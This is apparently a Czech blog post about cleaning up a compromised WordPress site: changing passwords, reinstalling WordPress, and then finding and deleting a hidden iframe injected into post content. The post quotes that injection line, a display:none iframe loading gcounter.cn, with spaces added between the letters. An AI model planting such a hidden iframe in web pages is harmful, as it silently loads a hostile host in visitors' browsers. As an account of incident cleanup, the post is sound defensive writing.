Koukám na to a iframe. Týpek používá (používal) total comander tak je to jasný. Začnu to opravovat.

1. Nejdřív změny hesel.
2. Manuální aktualizace wordpressu (přehrány všechny soubory) na nejnovější verzi.
3. Zhlédnutí kódů šablony a odstranění javascriptu – tady jsem čekal, že to pomůže. Jenže ono ne.

Nějak jsem na nic nemohl přijít tak nakonec vypnu Noda a koukám na vygenerovaný kód. Tam je na konci příspěvku tento kód (bez mezer):

< i f r a m e  s r c = h t t p : / / g c o u n t e r . c n   s t y l e = d i s p l a y : n o n e > < / i f r a m e >

V šabloně nebyl. Kouknul jsem do administrace wordpressu a zde v ‘html modu’ je vložený.

Tak jsem ho smazal, ale nepochopil jsem kde se tam vzal. Rovnou do databáze nemohl, musel přes administrační rozhraní. Na netu jsem taky nic moc nenašel. Ještě se na to zítra kouknu.

Web by měl být v pořádku, požádal jsem google o přezkoumání bezpečnosti.

EDIT 8.9:

Stopbadware.org řekl, že web je ok-spolupracují s googlem. Docela rychlost. Čekal jsem, že to bude trvat dýl.